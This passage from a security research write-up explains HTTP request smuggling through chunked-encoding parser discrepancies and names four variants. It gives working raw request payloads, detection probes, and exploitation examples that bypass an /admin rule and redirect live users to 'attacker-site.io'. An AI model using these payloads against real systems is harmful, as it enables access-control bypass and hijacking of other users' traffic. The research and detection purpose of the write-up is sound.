<p>It’s easy to see how a parser might come to choose option 1 without the author even realizing it. If it’s only looking for the terminating CRLF sequence without any intention of caring about the chunk extension, it will plausibly just throw away the <code class="language-plaintext highlighter-rouge">\n</code> along with any other byte (legal or otherwise) that might exist between the <code class="language-plaintext highlighter-rouge">;</code> and <code class="language-plaintext highlighter-rouge">\r\n</code> sequences. Control characters like newlines are not allowed in chunk extensions, and of course allowing illegal characters is incorrect behavior, so this option is in violation of the RFC.</p>

<p>The second option – interpreting the newline as a line terminator – might at a glance appear valid. After all, <a href="https://datatracker.ietf.org/doc/html/rfc9112#section-2.2-3">the RFC allows interpreting lone LFs as line terminators in the request line and headers</a>, so why not the chunk headers? Unfortunately, no such exception exists for the chunk lines; <strong>only the complete CRLF is a valid line terminator in the chunked body</strong>. You might not feel convinced that this is true, and I will grant you that it is a strange complication, especially since it’s not even explicitly addressed in the specification. However, <a href="https://www.rfc-editor.org/errata/eid7633">this errata review from 2023</a> confirms that the difference in allowed line terminators is in fact by design. As such, we conclude that option 2 is also in violation of the RFC.</p>

<p>Indeed, the only technically correct course of action is option 3: rejecting the request.</p>

<h3 id="the-vulnerability">The vulnerability</h3>
<p>Either of the two lenient parsing options is a harmless behavior on its own, but consider an environment with both a front-end reverse proxy (e.g. a load balancer, cache, or WAF) and a back-end web server. If the proxy in such an architecture applies one of the two incorrect interpretations while the server applies the other, we’re left with a parsing discrepancy. This discrepancy can be exploited to construct ambiguous HTTP requests, enabling <em>HTTP request smuggling</em> attacks.</p>

<p>There are two variants of this type of request smuggling vulnerability. I will refer to these as TERM.EXT and EXT.TERM:</p>
<ol>
  <li><strong>The terminator-extension (or TERM.EXT) variant</strong>: The proxy interprets a certain sequence in a chunk extension as a line terminator, and the server treats it as part of the chunk extension.</li>
  <li><strong>The extension-terminator (or EXT.TERM) variant</strong>: The server allows a certain sequence in a chunk extension that the proxy interprets as a line terminator.</li>
</ol>

<p>While the newline character <code class="language-plaintext highlighter-rouge">\n</code> is perhaps the best example of a sequence that can cause a parsing discrepancy, these techniques are not limited to <code class="language-plaintext highlighter-rouge">\n</code>; other potentially ambiguous sequences such as <code class="language-plaintext highlighter-rouge">\rX</code> and <code class="language-plaintext highlighter-rouge">\r</code> are equally exploitable, although much more uncommon.</p>

<p>An interesting thing to note is that these vulnerabilities fundamentally differ from conventional request smuggling vulnerabilities in that they do not rely on confusion between the <code class="language-plaintext highlighter-rouge">Content-Length</code> and <code class="language-plaintext highlighter-rouge">Transfer-Encoding</code> headers. This is good news for attackers, because while <a href="https://datatracker.ietf.org/doc/html/rfc9112#section-6.3-2.3">the RFC forbids an intermediary from forwarding both these headers</a>, chunk extensions can legally be forwarded. Many intermediaries do remove or normalize them, though.</p>

<h4 id="termext">TERM.EXT</h4>
<p>Let us first take a look at a simple TERM.EXT request smuggling payload. Below, both interpretations are shown using highlights to display the perceived chunk boundaries.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px; min-width: 700px;">
<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">2;<span class="http-line-break">\n</span><span class="http-highlight-text">chunk header</span>
</span>xx<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">45<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>0<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
<span class="http-line-break">\r\n</span>
GET /two HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</span><span class="http-highlight http-highlight-three"><span class="http-highlight-head http-highlight-three-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">TERM interpretation (proxy)</p>
</div>

<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">2;<span class="http-line-break">\n</span><span class="http-highlight-text">chunk header</span>
xx<span class="http-line-break">\r\n</span>
</span>45<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span>GET /two HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">EXT interpretation (server)</p>
</div>
</div>
</div>

<p>The key thing to notice in this request is of course the newline in the chunk extension which causes the parsing discrepancy. The proxy, interpreting the newline as a line terminator, will consider <code class="language-plaintext highlighter-rouge">45</code> the size of the second chunk, whereas the server will consider it the content of the first chunk. As such, a second pipelined request can be hidden in what the proxy perceives as the body of the second chunk.</p>

<p><em><strong>Note</strong>: The vulnerability I now presumptuously have coined ‘TERM.EXT’ was actually <a href="https://github.com/mattiasgrenfeldt/bachelors-thesis-http-request-smuggling">documented</a> back in 2021 by Matthias Grenfeldt and Asta Olofsson. I’ve taken the liberty of naming it to reflect its place in the broader family of chunk parsing vulnerabilities.</em></p>

<h4 id="extterm">EXT.TERM</h4>
<p>The EXT.TERM variant has to my knowledge never been documented before, although it follows quite naturally from the TERM.EXT technique. Let us have a look at a payload equivalent to the TERM.EXT payload above.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px; min-width: 700px;">
<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">45;<span class="http-line-break">\n</span><span class="http-highlight-text">chunk header</span>
AAAAAAAAAAAAA... <i>[69]</i><span class="http-line-break">\r\n</span>
</span>0<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
<span class="http-line-break">\r\n</span>
GET /two HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">EXT interpretation (proxy)</p>
</div>

<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">45;<span class="http-line-break">\n</span><span class="http-highlight-text">chunk header</span>
</span>AAAAAAAAAAAAA... <i>[69]</i><span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span>GET /two HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">TERM interpretation (server)</p>
</div>
</div>
</div>

<p>Much like in the TERM.EXT payload, the parsing discrepancy is introduced by the illegal <code class="language-plaintext highlighter-rouge">\n</code> in the chunk extension. The proxy ignores the sequence of 69 (0x45) A’s in the perceived chunk extension, whereas the server considers it the content of the first chunk. The remaining data is therefore interpreted as the chunk body by the proxy, but as a pipelined request by the server.</p>

<h3 id="what-about-chunk-bodies">What about chunk bodies?</h3>
<p>The attentive reader may have noticed that the TERM.EXT and EXT.TERM vulnerabilities are not so much inconsistencies in the parsing of <em>chunk extensions</em> as they are inconsistencies in the parsing of <em>line terminators</em>. The chunk extension itself is nothing more than a convenient place to hide a sequence of padding bytes (like <code class="language-plaintext highlighter-rouge">'xx'</code> or <code class="language-plaintext highlighter-rouge">'AAAAA...'</code>). In this light, it is only natural to ask: are line terminator parsing discrepancies in the chunk <em>body</em> not exploitable as well?</p>

<p>At first glance, the obvious answer appears to be <em>no</em>, precisely because there is no equivalent to the chunk extension in the chunk body. However, I have found that given the presence of one additional fairly common parsing leniency, we can extend the TERM.EXT and EXT.TERM techniques to exploit similar flaws in the line terminator parsing of the chunk body.</p>

<p>The trick is to use <em>oversized chunks</em> – that is, chunks with larger bodies than indicated in the chunk header. For example, consider the invalid chunked message body below:</p>

<div style="max-width: 100%; overflow-x: auto;">
<pre><code>5<span class="http-line-break">\r\n</span>
AAAAA<span class="http-highlight-one-compl" style="padding: 0 0px;">XXX</span><span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</code></pre>
</div>

<p>Some HTTP servers and proxies accept such malformed chunks and simply ignore the trailing excess bytes which I will henceforth refer to as the <em>spill</em>. By placing a sequence that one parser interprets as a line terminator in what another parser interprets as a spill, we obtain an exploitable parsing discrepancy. This allows us to define a new set of complementary parsing vulnerabilities that to my knowledge has never before been documented.</p>

<h4 id="termspill">TERM.SPILL</h4>
<p>Let us first consider the scenario in which the server accepts oversized chunk bodies. To exploit this leniency, we must then find a sequence that only the proxy recognizes as a line terminator.</p>

<p>In my experience, parsers are even more lenient regarding the CRLF after the chunk body. Since only the sequence <code class="language-plaintext highlighter-rouge">\r\n</code> is valid in this location, some parsers do not even bother to check it and just accept any 2-byte sequence. Here’s an example payload effective against a proxy using such a parser.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px; min-width: 700px;">
<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">5<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>AAAAAXX<span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">45<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>0<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
<span class="http-line-break">\r\n</span>
GET /two HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</span><span class="http-highlight http-highlight-three"><span class="http-highlight-head http-highlight-three-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">TERM interpretation (proxy)</p>
</div>

<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">5<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>AAAAAXX<span class="http-highlight-text">chunk body</span>
45<span class="http-line-break">\r\n</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span>GET /two HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">SPILL interpretation (server)</p>
</div>
</div>
</div>

<p>On the front-end, the <code class="language-plaintext highlighter-rouge">XX</code> sequence is interpreted as a CRLF, and the subsequent <code class="language-plaintext highlighter-rouge">45</code> sequence is interpreted as the size of the next chunk. On the back-end, the entire <code class="language-plaintext highlighter-rouge">XX45</code> sequence is interpreted as spill bytes and thus ignored. Therefore, a second pipelined request can be hidden in what the proxy perceives as the body of the second chunk.</p>

<h4 id="spillterm">SPILL.TERM</h4>
<p>In the opposite scenario, the proxy ignores spills in chunk bodies and we must find a sequence to place in a spill that only the server interprets as a line terminator. Let us this time suppose that a <code class="language-plaintext highlighter-rouge">\rX</code> sequence is ignored on the front-end but interpreted as a line terminator on the back-end.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px; min-width: 700px;">
<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">5<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>AAAAA<span class="http-line-break">\r</span>X<span class="http-highlight-text">chunk body</span>
2<span class="http-line-break">\r\n</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">45<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>0<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
<span class="http-line-break">\r\n</span>
GET /two HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</span><span class="http-highlight http-highlight-three"><span class="http-highlight-head http-highlight-three-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">SPILL interpretation (proxy)</p>
</div>

<div style="flex: 1;">

<pre><code>GET /one HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">5<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>AAAAA<span class="http-line-break">\r</span>X<span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-two"><span class="http-highlight-head http-highlight-two-compl">2<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk header</span>
</span>45<span class="http-line-break">\r\n</span><span class="http-highlight-text">chunk body</span>
</span><span class="http-highlight http-highlight-three"><span class="http-highlight-head http-highlight-three-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span>GET /two HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one"><span class="http-highlight-head http-highlight-one-compl">0<span class="http-line-break">\r\n</span><span class="http-highlight-text">last chunk</span>
</span><span class="http-line-break">\r\n</span>
</span></code></pre>

<p style="text-align: center; font-weight: bold;">TERM interpretation (server)</p>
</div>
</div>
</div>

<p>Here, the <code class="language-plaintext highlighter-rouge">\rX2</code> spill is ignored by the proxy, but interpreted as a CRLF followed by a chunk size of <code class="language-plaintext highlighter-rouge">2</code> on the back-end. Consequently, the <code class="language-plaintext highlighter-rouge">45</code> sequence is interpreted as a chunk size by the proxy, but as data by the back-end server, once again allowing a second request to be hidden from the proxy.</p>

<h3 id="a-short-note-on-normalization">A short note on normalization</h3>
<p>Normalization is the natural-born enemy of all four kinds of request smuggling we’ve discussed in the previous sections. Indeed, if the proxy strips chunk extensions and ‘spills’, replaces all line terminators with <code class="language-plaintext highlighter-rouge">\r\n</code>, or just rewrites the entire request with a <code class="language-plaintext highlighter-rouge">Content-Length</code> header, then it doesn’t really matter what parsing leniencies either the proxy or server has; it’s just not possible to cause a parsing discrepancy.</p>

<p>It is tempting to conclude from the above that a proxy that normalizes the chunked body before forwarding the request is immune to these sorts of attacks. One might even go as far as to claim that such a proxy <em>should</em> parse leniently in the name of robustness, as is decreed by <a href="https://en.wikipedia.org/wiki/Robustness_principle">Postel’s Law</a>:</p>

<blockquote>
  <p>be conservative in what you send, be liberal in what you accept</p>
</blockquote>

<p>The trouble with this assumption is that a proxy does not know in advance whether any additional proxies will be placed in front of it – it is not uncommon to chain proxies with different purposes in modern architectures. In such environments, a chunk-normalizing proxy with one of the parsing flaws we’ve discussed could still be exploitable for request smuggling if another downstream proxy is affected by the complementary parsing flaw.</p>

<h3 id="black-box-detection">Black-box detection</h3>
<p>Vulnerable combinations of servers and proxies can quite easily be identified by analyzing source code, but rarely do we in practice have the luxury of access to such details of our target’s systems. To discover these vulnerabilities in the wild, we need generic probes.</p>

<p>In order to design such probes, we can adapt the <a href="https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn#detect">timeout-based detection methods</a> developed by James Kettle in his 2019 request smuggling <a href="https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn">research</a>. The key idea here is to construct an HTTP request that will (1) cause a vulnerable front-end to drop the last portion of the request body and (2) cause a vulnerable back-end to hang if (and only if) some of the body doesn’t arrive. This concept can quite easily be adapted to our little family of chunk parsing vulnerabilities.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px; min-width: 700px;">
<div style="flex: 1;">
<pre><code>POST / HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
2;<span class="http-line-break">\n</span>
xx<span class="http-line-break">\r\n</span>
10<span class="http-line-break">\r\n</span>
1f<span class="http-line-break">\r\n</span>
AAAABBBBCCCC<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one">DDDDEEEEFFFF<span class="http-line-break">\r\n</span><span style="white-space: nowrap;" class="http-highlight-text">dropped by front-end</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</span></code></pre>
<p style="text-align: center; font-weight: bold;">TERM.EXT probe</p>
</div>

<div style="flex: 1;">
<pre><code>POST / HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
2;<span class="http-line-break">\n</span>
xx<span class="http-line-break">\r\n</span>
22<span class="http-line-break">\r\n</span>
c<span class="http-line-break">\r\n</span>
AAAABBBBCCCC<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-one">DDDDEEEEFFFF<span class="http-line-break">\r\n</span><span class="http-highlight-text">dropped by front-end</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</span></code></pre>
<p style="text-align: center; font-weight: bold;">EXT.TERM probe</p>
</div>
</div>
</div>

<p>In each of the example probes above, a proxy with the corresponding parsing flaw will interpret the first <code class="language-plaintext highlighter-rouge">0\r\n\r\n</code> sequence as the terminating zero-sized chunk, causing it to drop the part of the request marked in red. A vulnerable server receiving the request without the last part will expect more data to arrive, causing it to hang and eventually time out. This results in an easily identifiable time delay.</p>

<p>I’ve written a scanner script I call <a href="https://github.com/JeppW/smugchunks">smugchunks</a> for automating this vulnerability discovery technique. For those interested, its source code is publicly available on GitHub and includes payloads for TERM.SPILL and SPILL.TERM detection as well.</p>

<h3 id="exploitation">Exploitation</h3>
<p>Exploiting chunk parser differentials is really not much different from exploiting any other kind of request smuggling vulnerability; they can be used for the same attacks you know and love, such as circumventing front-end security controls and serving malicious responses to unsuspecting live clients.</p>

<p>In the interest of empowering readers to apply these techniques in practice, I’ve included a brief discussion on exploitation with some examples here. If you’re already well-versed in request smuggling, you will probably find nothing new in this section – feel free to skip ahead.</p>

<h4 id="bypassing-front-end-rules">Bypassing front-end rules</h4>
<p>As a smuggled request (by its very definition) is not interpreted as a request by the front-end proxy, it will not be subjected to any access control rules the front-end may enforce, nor will the front-end rewrite the headers of the request as it would normally. Depending on the nature and purpose of the proxy in question, bypassing these front-end operations can be hugely impactful.</p>

<p>Consider, for example, a front-end that restricts access to <code class="language-plaintext highlighter-rouge">/admin</code>. By exploiting a TERM.EXT vulnerability, we can circumvent this access control rule using a payload like the one below.</p>

<div style="max-width: 100%; overflow-x: auto;">
<pre><code>GET / HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
2;<span class="http-line-break">\n</span>
xx<span class="http-line-break">\r\n</span>
47<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span> 
<span class="http-line-break">\r\n</span>
GET /admin HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span> 
</code></pre>
</div>

<p>This simple payload, however, suffers from a major limitation. While the smuggled request <em>will</em> reach the back-end server, its response will not be returned to us. This is because the proxy believes it received only a single request, so it will usually not reply with two responses.</p>

<p>Fortunately, we can quite easily overcome this apparent blindness with a minor modification to the payload. We simply replace the <code class="language-plaintext highlighter-rouge">Transfer-Encoding</code> header with an oversized <code class="language-plaintext highlighter-rouge">Content-Length</code> header in the smuggled request and append a second pipelined request. When we make this change, we must also remember to update the chunk size accordingly.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px; min-width: 700px">
<div style="flex: 1;">
<pre><code><span class="http-highlight http-highlight-one">GET / HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
2;<span class="http-line-break">\n</span>
xx<span class="http-line-break">\r\n</span>
3f<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span> 
<span class="http-line-break">\r\n</span>
GET /admin HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Content-Length: 40<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span></span><span class="http-highlight http-highlight-two">GET / HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span></span></code></pre>
<p style="text-align: center; font-weight: bold;">Proxy interpretation</p>
</div>

<div style="flex: 1;">
<pre><code><span class="http-highlight http-highlight-one">GET / HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #1</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
2;<span class="http-line-break">\n</span>
xx<span class="http-line-break">\r\n</span>
3f<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span> 
<span class="http-line-break">\r\n</span></span><span class="http-highlight http-highlight-two">GET /admin HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text-req"><b>request #2</b></span>
Host: localhost<span class="http-line-break">\r\n</span>
Content-Length: 40<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
GET / HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span></span></code></pre>
<p style="text-align: center; font-weight: bold;">Server interpretation</p>
</div>
</div>
</div>

<p>From the proxy’s perspective, it is now receiving two pipelined requests, so it will happily return two responses. However, what the proxy considers to be the second pipelined request is in fact interpreted as the body of the smuggled request on the back-end. As such, we will obtain the response to the <code class="language-plaintext highlighter-rouge">GET /admin</code> request in the second response.</p>

<p>An important caveat here is that the payload above will not work if the front-end decides to forward the requests over two separate back-end connections. In this situation, we can obtain the response by instead issuing a series of <code class="language-plaintext highlighter-rouge">GET /</code> follow-up requests after delivering the payload. One of these should eventually be routed through the same connection as the payload and consequently be served the response to the smuggled request. Of course, this carries with it the risk of another client reaching the poisoned socket first. Incidentally, that is what we will deliberately exploit in the next section.</p>

<h4 id="exploiting-live-users">Exploiting live users</h4>
<p>A very similar technique can be used to corrupt the requests sent by other live clients of the server. Instead of sending follow-up HTTP requests ourselves, we smuggle a request with an oversized <code class="language-plaintext highlighter-rouge">Content-Length</code> and wait for another user’s request to reach the same socket. The server will interpret the victim’s request as the body of the smuggled request, causing the victim to receive the response that the back-end server intended for us.</p>

<p>This is particularly impactful if we have a way of eliciting a harmful response from the server. For example, an otherwise unexploitable header-based open redirect can be used to redirect random live users to a site of our choosing. If the application for instance responds with a <code class="language-plaintext highlighter-rouge">301 Redirect</code> with a <code class="language-plaintext highlighter-rouge">Location</code> header reflecting the value of the <code class="language-plaintext highlighter-rouge">X-Forwarded-Host</code> request header, live users of an EXT.TERM-vulnerable application could be redirected to <code class="language-plaintext highlighter-rouge">attacker-site.io</code> using the payload below.</p>

<div style="max-width: 100%; overflow-x: auto;">
<pre><code>GET / HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
Transfer-Encoding: chunked<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
5f;<span class="http-line-break">\n</span>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
GET / HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
X-Forwarded-Host: attacker-site.io<span class="http-line-break">\r\n</span>
Content-Length: 100<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
</code></pre>
</div>

<p>Once the front-end forwards another request over the same back-end connection, the server will interpret it as the body of the smuggled request and respond accordingly, leading to the victim being served the malicious redirect. On the back-end, the request looks as shown below.</p>

<div style="max-width: 100%; overflow-x: auto;">
<div style="display: flex; gap: 10px; min-width: 700px">
<div style="flex: 1;">
<pre><code>GET / HTTP/1.1<span class="http-line-break">\r\n</span>
Host: localhost<span class="http-line-break">\r\n</span>
X-Forwarded-Host: attacker-site.io<span class="http-line-break">\r\n</span>
Content-Length: 100<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
0<span class="http-line-break">\r\n</span>
<span class="http-line-break">\r\n</span>
<span class="http-highlight http-highlight-two">GET /some/path HTTP/1.1<span class="http-line-break">\r\n</span><span class="http-highlight-text">victim's request</span>
Host: localhost<span class="http-line-break">\r\n</span>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)...<span class="http-line-break">\r\n</span>
...</span></code></pre>
</div>
</div>
</div>

